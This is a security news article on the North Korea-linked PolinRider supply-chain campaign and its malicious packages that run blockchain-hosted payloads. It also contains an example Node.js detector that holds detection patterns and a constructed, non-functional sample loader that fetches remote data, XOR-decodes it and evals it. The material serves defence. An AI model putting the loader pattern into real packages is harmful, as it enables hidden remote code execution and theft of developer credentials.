North Korea’s developer-targeting machine has industrialized. Threat actors linked to the long-running Contagious Interview operation have published 108 unique malicious packages and browser extensions across npm, Packagist, Go, and Google Chrome, as part of an ongoing campaign researchers call PolinRider. The packages hide obfuscated JavaScript loaders that reach out to public blockchain infrastructure for their real payload — and the goal is what it always is for this actor: developer credentials, browser secrets, and cryptocurrency.
Reported by The Hacker News and detailed by Socket’s threat research team, the 108 packages span 162 malicious release artifacts across multiple versions, broken down as 19 npm libraries, 10 Composer (Packagist) packages, 61 Go modules, and one Chrome extension. The campaign is not a one-time dump — it’s a sustained supply-chain seeding operation that keeps regenerating as maintainer accounts fall.
Malware Hidden Behind the Blockchain
The technical design is what elevates PolinRider above generic typosquatting. Each malicious package ships an obfuscated JavaScript loader. After deobfuscation, the loader doesn’t hardcode a command-and-control server — instead, in many cases it reaches out to blockchain and public RPC infrastructure, including TRON, Aptos, and BNB Smart Chain services, to retrieve encrypted second-stage payload material. It then decrypts that material with embedded XOR keys and executes the result with eval().
Using public blockchain RPC endpoints as a dead-drop for payloads is clever tradecraft. Blockchain traffic is legitimate, ubiquitous, and hard to block wholesale — a developer’s machine talking to a TRON RPC node looks like Web3 development, not malware C2. It also gives the attackers a censorship-resistant, hard-to-take-down delivery channel that survives domain seizures.
The follow-on payloads observed include DEV#POPPER and OmniStealer, delivering the full North Korean developer-theft kit: command execution, socket.io-client-based C2, credential theft, browser-data theft, and wallet exfiltration.
The Scale Behind the 108 Packages
The published packages are only the storefront. Underneath, PolinRider is a mass GitHub-compromise operation. First flagged by the OpenSourceMalware team in March 2026, the campaign implants obfuscated JavaScript payloads across hundreds of public GitHub repositories to deliver a new variant of BeaverTail, the JavaScript malware that has been Contagious Interview’s signature for over a year.
As of April 11, 2026, the activity had compromised 1,951 public GitHub repositories belonging to 1,047 unique owners. It has also merged with a cluster called TaskJacker, which drops malicious VS Code task files into victims’ existing repositories — turning a developer’s own editor configuration into an execution trigger.
The infection method is self-sustaining: attackers compromise maintainer accounts, modify legitimate repositories, and publish infected package versions wherever they retain or obtain registry access. Take down one package and another appears under a different compromised account. Socket and the registries are playing whack-a-mole against an actor that treats package publication as a renewable resource.
Why North Korea Keeps Coming for Developers
This is not opportunistic crime — it’s a state revenue and espionage program. The Contagious Interview operation has spent well over a year targeting software developers specifically, often through fake job interviews in which candidates are asked to run “coding assignments” laced with malware. PolinRider is the supply-chain flank of the same effort: instead of luring individual developers, it poisons the packages developers install by the thousand.
The payoff is layered. A compromised developer machine yields cryptocurrency (directly funding a sanctioned regime), cloud and CI/CD credentials (enabling deeper supply-chain attacks against the developer’s employer), and a foothold in software organizations that can be sold or escalated. We’ve documented this actor’s reach repeatedly — from malicious JetBrains plugins stealing AI API keys to the Axios npm supply-chain RAT and the LiteLLM PyPI compromise. The open-source registry is now a standing battlefield.
Defending Against Package-Level Compromise
- Pin and verify dependencies. Lockfiles, integrity hashes, and pinned versions blunt the “compromised maintainer pushes a malicious patch” vector that PolinRider depends on. Don’t auto-update transitive dependencies into production.
- Watch for install-time and postinstall scripts that reach out to unexpected endpoints — including blockchain RPC nodes, which have no business in most build pipelines.
- Use software composition analysis (Socket, Trivy, and similar) that inspects package behavior, not just known-CVE lists — PolinRider packages are novel, so signature-only scanning misses them.
- Isolate development and build environments. Developer machines with wallet access, cloud credentials, and production reach are the highest-value targets on the network; treat them accordingly.
- Be maximally suspicious of “interview” coding tasks. If a prospective employer asks you to run unfamiliar code on your personal machine, that is the Contagious Interview playbook — run it in a disposable VM or not at all.
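As an added illustration of the first two defenses above (this is example code, not the article's or Socket's), the following Node.js audit flags the loader traits described earlier (lifecycle scripts, JavaScript that contacts blockchain RPC hosts and eval()s XOR-decoded data) and lists lockfile entries with no integrity hash. The RPC host substrings and all sample inputs are assumptions constructed for the example.

```javascript
// Added example, not code from the article or Socket. Flags the PolinRider traits the
// text describes and package-lock entries that cannot be integrity-verified at install.
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
// Assumed: substrings of public RPC hosts for the chains named in the report.
const RPC_HOST_HINTS = ["trongrid", "aptoslabs", "bsc-dataseed", "bnbchain"];
const EVAL_RE = /\beval\s*\(/;
const XOR_RE = /charCodeAt\([^)]*\)\s*\^/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// pkgJson: parsed package.json; sources: map of file name -> JavaScript text.
function auditPackage(pkgJson, sources) {
  const findings = [];
  for (const hook of LIFECYCLE) {
    if (pkgJson.scripts && pkgJson.scripts[hook]) {
      findings.push(`lifecycle script "${hook}": ${pkgJson.scripts[hook]}`);
    }
  }
  for (const [file, src] of Object.entries(sources)) {
    for (const m of src.matchAll(URL_RE)) {
      const host = m[1].toLowerCase();
      if (RPC_HOST_HINTS.some((h) => host.includes(h))) {
        findings.push(`${file}: contacts blockchain RPC host ${host}`);
      }
    }
    if (EVAL_RE.test(src) && XOR_RE.test(src)) {
      findings.push(`${file}: eval() of XOR-decoded data`);
    }
  }
  return findings;
}

// lock: parsed package-lock.json (v2/v3). Entries without "integrity" cannot be
// verified by npm at install time, which defeats the pin-and-verify defense.
function unverifiedLockEntries(lock) {
  return Object.entries(lock.packages || {})
    .filter(([name, entry]) => name !== "" && !entry.integrity)
    .map(([name]) => name);
}

// Constructed sample inputs: setup.js is a non-functional sketch of the pattern
// (placeholder path and undefined KEY), used only to exercise the detector.
const samplePkg = { name: "example-lib", scripts: { postinstall: "node setup.js" } };
const sampleSources = {
  "setup.js": 'fetch("https://api.trongrid.io/PLACEHOLDER").then(r => r.text()).then(d => {' +
    ' let o = ""; for (let i = 0; i < d.length; i++) o += String.fromCharCode(d.charCodeAt(i) ^ KEY[i % KEY.length]); eval(o); })',
};
const sampleLock = { packages: { "": {}, "node_modules/example-dep": { version: "1.3.0" },
  "node_modules/example-pinned": { version: "2.1.3", integrity: "sha512-CONSTRUCTED" } } };
console.log(auditPackage(samplePkg, sampleSources));
console.log(unverifiedLockEntries(sampleLock));
```

Run it against a freshly fetched tarball's package.json and .js files before the package is ever installed; a hit on any finding is reason to block the install, not just to log it.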
The Bottom Line
One hundred and eight malicious packages, nearly 2,000 poisoned repositories, and a blockchain-hosted payload channel that resists takedown — PolinRider is what a well-resourced state actor’s supply-chain program looks like when it matures. The registries will keep pulling packages and the attackers will keep publishing them. For developers, the only durable defense is to stop treating “it’s on npm” or “it’s on GitHub” as any kind of trust signal at all.
Sources
- The Hacker News — North Korean Hackers Publish 108 Malicious Packages and Extensions in PolinRider Campaign
- Socket — PolinRider: North Korea-Linked Supply Chain Campaign Expands
- Developer-Tech — PolinRider supply chain attack expands to Packagist ecosystem
- GBHackers — Hackers Compromise GitHub Maintainer Accounts to Publish PolinRider-Infected Package Versions